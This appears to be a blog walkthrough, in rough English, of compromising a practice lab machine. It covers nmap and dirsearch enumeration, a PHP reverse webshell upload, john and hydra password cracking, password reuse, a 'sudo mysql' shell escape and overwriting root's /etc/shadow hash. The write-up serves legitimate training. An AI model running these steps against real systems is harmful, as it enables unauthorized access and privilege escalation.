本文已参与「新人创作礼」活动,一起开启掘金创作之路
Enum
nmap 192.168.107.132 -sCV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
And it also open the web and ssh ports .
So as usual , we try to bust the dir of the target
python3.9 dirsearch.py -u 192.168.107.132 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --suffix=.php,.html,.aspx,.jsp,.js
[10:31:43] 200 - 11KB - /index.html
[10:31:43] 200 - 4KB - /mini.php
[10:31:44] 301 - 323B - /javascript -> http://192.168.103.132/javascript/
[10:31:55] 301 - 323B - /phpmyadmin -> http://192.168.103.132/phpmyadmin/
[10:31:55] 200 - 13KB - /phpmyadmin/doc/html/index.html
[10:31:57] 200 - 10KB - /phpmyadmin/index.php
[10:31:57] 200 - 10KB - /phpmyadmin/
[10:32:01] 200 - 21B - /robots.txt
roberts.txt
curl 192.168.103.132/robots.txt
Allow: Enum_this_Box
phpmyadmin
I use hydra to try to crake the passwd by using the default username root . But nothing is found .
When I browse to mini.php , this is a Zerion Mini Shell 1.0 .
log as www-data
So I upload the webshell to /var/www/html .
(webshell is /usr/share/webshells/php/php-reverse-shell.php)
![spaces_-MFlgUPYI8q83vG2IJpI_uploads_git-blob-15f40b0669d0d1d5ed685cd2afa0387d2db304f8_image[1].png][2]
Then I browse the /webshell.php directly , because we know the above file exist inthe root directory .
And I get the shell of www-data . After , I find there is five users in this machine .
goat harry karla oracle sally
During I enum the dir , I find phpmyadmin is ran on this machine , so I try to find the passwd of sql .
Finally , I find it at /etc/phpmyadmin/config-db.php .
log as oracle
The www-data don't have the pri to use sudo . So I have to find other way to escalate the pri .
I open the /etc/passwd and find the passwd hash of the oracle .
So I save the hash to local named passwd and use john to crake the passwd by the dictionary of rockyou . And get it .
john passwd -w /usr/share/wordlists/rockyou.txt
This user is denied by login from ssh , so I use su oracle to login . Unluckily , there is nothing I cn do by the account of oracle .
log as karla
When I use the passwd to login the sql , and find notinf interesting in the contained databases .
Then I think maybe this passwd is used by other users in /home directory .
So I start to throw the passwords at the users until I get a match on the user "karla" . And even this user is allowd to log by ssh .
Surprisely , When I cheack sudo -l , I find karla can run any command as root , so I just need to run
sudo /bin/bash
And I get the root priviledge
Another way
log as goat
The author of this mathine say I should use rockyou to enum the target . But I have never use it install of get the password of the useless account oracle . So I try to use hydra and the username I get at /home to crack the password .
I save the users at username doc
hydra -l username -P rockyou.txt -V 192.168.49.107 ssh
Luckily , I get the password of goat:goat . And it also can be logged by ssh .
As the steps above , I can use sudo to run mysql .
So I use mysql to get a root shell
sudo mysql # use root priviledge to run mysql
system bash # use mysql to excute command
Or you can just use
sudo /usr/bin/mysql -e '! /bin/sh'
After root
After I escalate the priviledge of root , I think maybe there are some other ways to get the mathine . So I open the /etc/shadow to get the hash of other users . And running the john to get the password of all of them instead of root . But as I thought , they don't have another way to log in .
Until now , only I cannot log in root with password . So I decide to edit the content of /etc/shadow to change the password of root . So I copy the hash of harry to root . So I can login root with 123456 .
Now I wholly own the target mathine .
\